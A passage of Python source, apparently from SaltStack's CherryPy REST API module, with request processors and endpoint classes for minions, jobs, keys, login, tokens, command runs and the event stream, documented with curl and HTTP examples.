msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
'on_start_resource': [
('html_override', html_override_tool),
('salt_token', salt_token_tool),
],
'before_request_body': [
('cors_tool', cors_tool),
('salt_auth', salt_auth_tool),
('hypermedia_in', hypermedia_in),
],
'before_handler': [
('lowdata_fmt', lowdata_fmt),
('hypermedia_out', hypermedia_out),
('salt_ip_verify', salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(cherrypy.tools, tool_name, cherrypy.Tool(
hook, tool_fn, priority=(50 + idx)))
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.salt_token.on': True,
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if 'token' in chunk:
# Make sure that auth token is hex
try:
int(chunk['token'], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, 'Invalid token')
if 'token' in chunk:
# Make sure that auth token is hex
try:
int(chunk['token'], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, 'Invalid token')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
@cherrypy.config(**{'tools.sessions.on': False})
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect # pylint: disable=unused-import
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = {'client': 'runner'}
if jid:
lowstate.update({'fun': 'jobs.list_job', 'jid': jid})
else:
lowstate.update({'fun': 'jobs.list_jobs'})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns:
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
if six.PY3:
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, BytesIO(pub_key))
tarball.addfile(priv_key_file, BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = len(fileobj.getvalue())
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
if token['eauth'] == 'django' and '^model' in eauth:
perms = token['auth_list']
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug(
"Configuration for external_auth malformed for eauth '%s', "
"and user '%s'.", token.get('eauth'), token.get('name'),
exc_info=True
)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Token(LowDataAdapter):
'''
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
'''
@cherrypy.config(**{'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
'''
for creds in cherrypy.request.lowstate:
try:
creds.update({
'client': 'runner',
'fun': 'auth.mk_token',
'kwarg': {
'username': creds['username'],
'password': creds['password'],
'eauth': creds['eauth'],
},
})
except KeyError:
raise cherrypy.HTTPError(400,
'Require "username", "password", and "eauth" params')
return list(self.exec_lowstate())
class Run(LowDataAdapter):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instead,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: text
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
yield str('retry: 400\n') # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield str('tag: {0}\n').format(data.get('tag', '')) # future lint: disable=blacklisted-function
yield str('data: {0}\n\n').format(salt.utils.json.dumps(data)) # future lint: disable=blacklisted-function
return listen()
class WebsocketEndpoint(object):
'''
